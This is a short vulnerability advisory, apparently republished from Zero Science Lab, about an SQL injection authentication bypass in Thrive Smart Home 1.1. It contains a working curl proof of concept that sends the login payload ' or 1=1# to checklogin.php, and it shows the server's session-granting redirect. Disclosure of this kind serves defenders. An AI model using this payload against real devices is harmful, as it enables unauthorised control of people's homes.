Thrive Smart Home 1.1 SQL Injection Authentication Bypass

Vulnerability Key Information Vulnerability Name: Thrive Smart Home 1.1 Authentication Bypass Date: 2019-12-30 Author: LiquidWorm Vendor: Thrive Product Website: http://www.thrivesmarthomes.com Affected Version: 1.1 Test Environment: - Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips - Apache httpd 2.4.25 (Raspbian) Risk Level: Medium CVE ID: N/A CWE ID: N/A Vulnerability ID: ZSL-2019-5554 Vulnerability URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php Vulnerability Description This application is affected by an SQL injection vulnerability. The POST parameter passed to is not properly sanitized before being returned to the user or used in SQL queries, allowing attackers to inject arbitrary SQL code and bypass the authentication mechanism. Vulnerability Discoverer Gjoko 'LiquidWorm' Krstic (@zeroscience) Test Command Example ```bash $ curl http://192.168.1.1:8080/raspberry/include/checklogin.php -X POST -d"submit=LOGIN&user=' or 1=1#&pass=pass" -i HTTP/1.1 302 Found Date: Mon, 21 Oct 2019 23:35:18 GMT Server: Apache/2.4.25 (Raspbian) Set-Cookie: PHPSESSID=6cu3frj0qes9c96v5de5vp37e2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: ../home.php Content-Length: 1 Content-Type: text/html; charset=UTF-8

Goal Reached Thanks to every supporter — we hit 100%!

Thrive Smart Home 1.1 SQL Injection Authentication Bypass